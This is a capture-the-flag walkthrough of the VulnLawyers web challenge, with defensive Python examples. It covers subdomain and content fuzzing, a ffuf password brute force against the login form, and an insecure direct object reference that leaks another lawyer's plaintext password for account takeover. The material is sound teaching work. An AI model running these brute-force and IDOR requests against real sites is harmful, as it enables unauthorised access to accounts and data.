A Little Disclaimer
So you’re looking for answers, are ya? Well, I’ve got them, but for a price… Namely a little bit of your time and attention:
Please try the challenges yourself before checking the answers.
CTFs are notoriously ‘NP’ prone. Once you’ve seen the answer, it’s easy to think you could’ve come up with that. There is nothing wrong with looking up answers, but try to reflect on why you couldn’t figure it out. I try to explain my thought process as best and as briefly as possible, but figuring it out yourself is just the best feeling, so please give it another go when you’re reading this! I’ll not include any of the flags to avoid people simply copying and pasting them.
Another note, I create these writeups as if speaking to myself. If my manner of speaking seems a bit odd, you try talking to yourself without sounding a little odd.
Flags
Data Baby (Enumeration)
The first flag can be found by performing a standard recon of the subdomains of vulnlawyers.co.uk.
$ dnsrecon -d vulnlawyers.co.uk -D ~/path/to/wordlists/subdomains.txt -t brt
[*] Using the dictionary file: /home/zohar/Documents/Playground/wordlists/subdomains.txt (provided by user)
[*] brt: Performing host and subdomain brute force against vulnlawyers.co.uk...
[+] A data.vulnlawyers.co.uk 68.183.255.206
[+] A www.vulnlawyers.co.uk 68.183.255.206
[+] 2 Records Found
Doing an HTTP request with curl, or opening the domain in your browser, returns some info about the API and the first flag.
$ curl http://data.vulnlawyers.co.uk -H "Cookie: <your_ctf_cookie>"
{"name":"VulnLawyers Website API","version":"2.1.04","flag":"[^FLAG^1337-DIY-1337^FLAG^]"}
Browsers are Evil (Enumeration)
Now that we know the different domains that are available to us, let’s do some recon on the different files and folders we have access to.
$ ffuf -w ~/Documents/Playground/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=<your_ctf_cookie>" -u http://www.vulnlawyers.co.uk/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
[...]
________________________________________________
css [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 15ms]
denied [Status: 401, Size: 1020, Words: 178, Lines: 30, Duration: 15ms]
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 15ms]
js [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 14ms]
login [Status: 302, Size: 1119, Words: 197, Lines: 31, Duration: 16ms]
Since we are (always) looking to escalate privileges, the login endpoint looks especially interesting. Entering http://www.vulnlawyers.co.uk/login in your browser will lead to a page that says Access is denied from your IP address. Shit. But take a look at where we are, http://www.vulnlawyers.co.uk/denied: we’ve been rerouted.
Let’s take a look at what happens with our request in the browser by opening the developer tab (often F12, but if you didn’t know that, you might want to look into some other challenges). Opening the ‘Network’ tab (on Firefox, might be different on Chrome, Safari, etc.) shows that we got a 302 code from the /login endpoint. This code specifically tells a browser to reroute to a URL given by the Location header [1].
Browsers can do weird stuff, so let’s try to ask curl what’s up.
$ curl www.vulnlawyers.co.uk/login -H "Cookie: ctfchallenge=<your_ctf_cookie>"
[...]
<div class="alert alert-info">
<p>Access to this portal can now be found here <a href=/lawyers-only">/lawyers-only</a></p>
<p>[^FLAG^TRY_ME_B*TCH^FLAG^]</p>
</div>
[...]
Well, would you look at that, a flag and a hidden endpoint :eyes:! Christmas came early this year.
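The lesson here is that a redirect response can carry a body the browser never shows you. As an added example (not code from the writeup), this small audit routine parses a raw HTTP response and reports any 3xx whose body still contains content or links; the sample response is constructed to mirror the /login reply above, and the Finding/parse_response names are my own.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Finding:
    status: int
    location: str
    body_bytes: int
    leaked_links: list = field(default_factory=list)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def audit_redirect(raw: bytes, max_body: int = 0):
    """Return a Finding for a 3xx response that leaks links or more than
    `max_body` bytes of body; None for clean redirects and non-redirects."""
    status, headers, body = parse_response(raw)
    if not 300 <= status < 400:
        return None
    links = re.findall(r'href=["\']?([^"\'\s>]+)', body.decode("utf-8", "replace"))
    if not links and len(body) <= max_body:
        return None
    return Finding(status, headers.get("location", ""), len(body), links)


# Constructed sample modelled on the /login response shown above (flag omitted).
SAMPLE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /denied\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b'<div class="alert alert-info">'
    b'<p>Access to this portal can now be found here <a href=/lawyers-only">/lawyers-only</a></p>'
    b"</div>"
)
```

The same check can be run against real responses by fetching with redirects disabled (curl without -L, or requests with allow_redirects=False) and passing the raw bytes in.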
Opening the URL http://www.vulnlawyers.co.uk/lawyers-only will bring us to a login screen. Now we can start gaining some unrequested privileges.
Pipelining (Enumeration)
The current goal is to log in, but we lack any user data. Thinking back, the data.vulnlawyers.co.uk subdomain probably contains some of that precious user data. Actually, we have yet to enumerate its files and folders. Not you tho, no, while we were trying to figure out how to access the login page, you have of course started ffuf’ing (that’s not a word, but it should be) the domain. If you haven’t, keep in mind that reconnaissance can sometimes take a long time. Minimize waiting and keep that noggin of yours churning.
$ ffuf -w ~/Documents/Playground/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=<your_ctf_cookie>" -u http://data.vulnlawyers.co.uk/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
[...]
________________________________________________
users [Status: 200, Size: 406, Words: 6, Lines: 1, Duration: 21ms]
’Lo and behold, an endpoint called /users. Let’s employ curl and see what it holds.
$ curl data.vulnlawyers.co.uk/users -H "Cookie: ctfchallenge=<your_ctf_cookie>"
{
"users": [
{
"name": "Yusef Mcclain",
"email": "yusef.mcclain@vulnlawyers.co.uk"
},
{
"name": "Shayne Cairns",
"email": "shayne.cairns@vulnlawyers.co.uk"
},
{
"name": "Eisa Evans",
"email": "eisa.evans@vulnlawyers.co.uk"
},
{
"name": "Jaskaran Lowe",
"email": "jaskaran.lowe@vulnlawyers.co.uk"
},
{
"name": "Marsha Blankenship",
"email": "marsha.blankenship@vulnlawyers.co.uk"
}
],
"flag": "[^FLAG^https://media.giphy.com/media/26gs6vEzlpaxuYgso/giphy.gif^FLAG^]"
}
And that’s our third flag. Onto exploitation!
Higher and Higher (Exploitation)
With a bit of luck, the attorneys are not technically inclined and use simple passwords. After a bit of trial-and-error, we stumble upon Jaskaran Lowe.
$ ffuf -w ~/Documents/Playground/wordlists/passwords.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=<your_ctf_cookie>" -u http://www.vulnlawyers.co.uk/lawyers-only-login -H "Content-Type: application/x-www-form-urlencoded" -d 'email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ' -fr "Invalid"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
[...]
________________________________________________
summer [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
Logging in using the browser gives us some info regarding a case, but more importantly, the next flag!
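From the other side of the wire, a wordlist run like the one above is a burst of POSTs to the login endpoint from one client. As an added example (not from the writeup), here is a detector over combined-format access-log lines that flags any client exceeding a number of login attempts inside a sliding window; the log lines are constructed and the function names are mine.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
LOGIN_PATH = "/lawyers-only-login"  # the endpoint fuzzed above


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def detect_login_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Map ip -> peak attempts for clients whose login POSTs exceed `threshold`
    within any `window`. Status is ignored on purpose: a successful 302 at the
    end of a run of failures is exactly the ffuf shape above."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or path != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:  # drop attempts older than the window
            q.popleft()
        if len(q) > threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


# Constructed sample: six guesses from one client in a few seconds (five "Invalid"
# pages with status 200, then the 302 on success) plus one normal login elsewhere.
SAMPLE_LOG = [
    f'198.51.100.7 - - [01/Jan/2021:10:00:0{i} +0000] "POST {LOGIN_PATH} HTTP/1.1" '
    f'{200 if i < 5 else 302} {1119 if i < 5 else 0} "-" "ffuf"'
    for i in range(6)
] + ['203.0.113.9 - - [01/Jan/2021:10:00:09 +0000] "POST /lawyers-only-login HTTP/1.1" 302 0 "-" "Mozilla/5.0"']
```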
Some More Digging (Exploitation)
We got a whole new section of the site to explore! Now, it might be worth doing some more fuzzing on the path since we’ve actually been redirected to .../lawyers-only-login from .../lawyers-only, and opening the Profile tab shows the path .../lawyers-only-profile. Thus, we run ffuf [...] http://www.vulnlawyers.co.uk/lawyers-only-FUZZ while further exploring the new domain. Spoiler alert: no interesting results, but a good habit nonetheless.
Looking at the Portal page shows a list of current cases. There is a single case, which is managed by Shayne Cairns, who is also the only one who can perform actions on it. New goal: gain access to their account. Opening the source code of the page shows nothing interesting.
Taking a closer look at the Profile page shows us a place where we can update our user data! Immediate thought: could we somehow use this to update another user’s profile info? Let’s take a look at the request payload using the Network tab in the dev tools.
name=Jaskaran+Lowe&email=jaskaran.lowe%40vulnlawyers.co.uk
Hmm, doesn’t seem like it. This leads to finding more info in the request, like a new cookie called token. Makes sense, these requests have to be authenticated, so we should include this in any requests we do via the terminal. Otherwise, nothing seems unusual.
Perhaps we can find something interesting in the source code. Let’s use curl to retrieve the data.
$ curl http://www.vulnlawyers.co.uk/lawyers-only-profile -H "Cookie: ctfchallenge=<your_ctf_cookie>; token=<your_lawyer_cookie>"
<script>
$.getJSON('/lawyers-only-profile-details/4',function(resp){
$('input[name="email"]').val( resp.email );
$('input[name="name"]').val( resp.name );
});
</script>
Oh would you look at that :sunglasses:! That’s how our info was already filled in! For some reason they use some other source than the data.vulnlawyers.co.uk/users endpoint which we’ve seen before. Maybe this contains different information.
$ curl http://www.vulnlawyers.co.uk/lawyers-only-profile-details/4 -H "Cookie: ctfchallenge=<your_ctf_cookie>; token=<your_lawyer_cookie>"
{
"id": 4,
"name": "Jaskaran Lowe",
"email": "jaskaran.lowe@vulnlawyers.co.uk",
"password": "summer"
}
Oh yes. Plain old passwords. Of course, they should have used the data.vulnlawyers.co.uk/users API endpoint to retrieve that data. Let’s access Shayne Cairns’ profile details with the user id which we can find at data.vulnlawyers.co.uk/users. Small note: that id was zero-indexed (Jaskaran’s id here is 4 while it was 3 before), this one isn’t. Compensating for that gives the following request.
$ curl http://www.vulnlawyers.co.uk/lawyers-only-profile-details/2 -H "Cookie: ctfchallenge=<your_ctf_cookie>; token=<your_lawyer_cookie>"
{
"id": 2,
"name": "Shayne Cairns",
"email": "shayne.cairns@vulnlawyers.co.uk",
"password": "wa1^3p",
"flag": "[^FLAG^NA_AH^FLAG^]"
}
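Two defects stack up in that endpoint: any logged-in lawyer can read any id (an insecure direct object reference), and the row is serialised with its plaintext password. As an added example (not the site’s code), here is a lookup written both ways: the vulnerable variant mirrors the observed behaviour, the hardened one ties the id to the session and allow-lists the fields that leave the server. The in-memory table, role field and exception names are assumptions for this example.

```python
# Constructed records; a real password column would hold a salted hash, never the
# clear text that /lawyers-only-profile-details returned above.
USERS = {
    2: {"id": 2, "name": "Shayne Cairns", "email": "shayne.cairns@vulnlawyers.co.uk",
        "password": "<stored-hash>", "role": "lawyer"},
    4: {"id": 4, "name": "Jaskaran Lowe", "email": "jaskaran.lowe@vulnlawyers.co.uk",
        "password": "<stored-hash>", "role": "lawyer"},
}
PUBLIC_FIELDS = ("id", "name", "email")  # allow-list: password is deliberately absent


class Forbidden(Exception):
    pass


class NotFound(Exception):
    pass


def profile_details_vulnerable(session, record_id):
    """Only checks that *a* session exists, then hands back the raw row."""
    if not session.get("user_id"):
        raise Forbidden("login required")
    if record_id not in USERS:
        raise NotFound(record_id)
    return dict(USERS[record_id])


def profile_details_hardened(session, record_id):
    """Authorise the id against the session before touching the table, then
    serialise only allow-listed fields."""
    uid = session.get("user_id")
    if not uid:
        raise Forbidden("login required")
    # Ownership check first, so a non-owner cannot even learn whether an id exists.
    if record_id != uid and session.get("role") != "admin":
        raise Forbidden("not your record")
    row = USERS.get(record_id)
    if row is None:
        raise NotFound(record_id)
    return {k: row[k] for k in PUBLIC_FIELDS}
```

The simplest hardening of all is to drop the id from the URL entirely and always resolve the record from the session.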
Flag number five!
Finishing Up (Exploitation)
This leaves us with the last flag. We now use the found credentials to log in as Shayne Cairns, delete the case, and find the last flag :trophy:.
[1] 302 Found, https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/302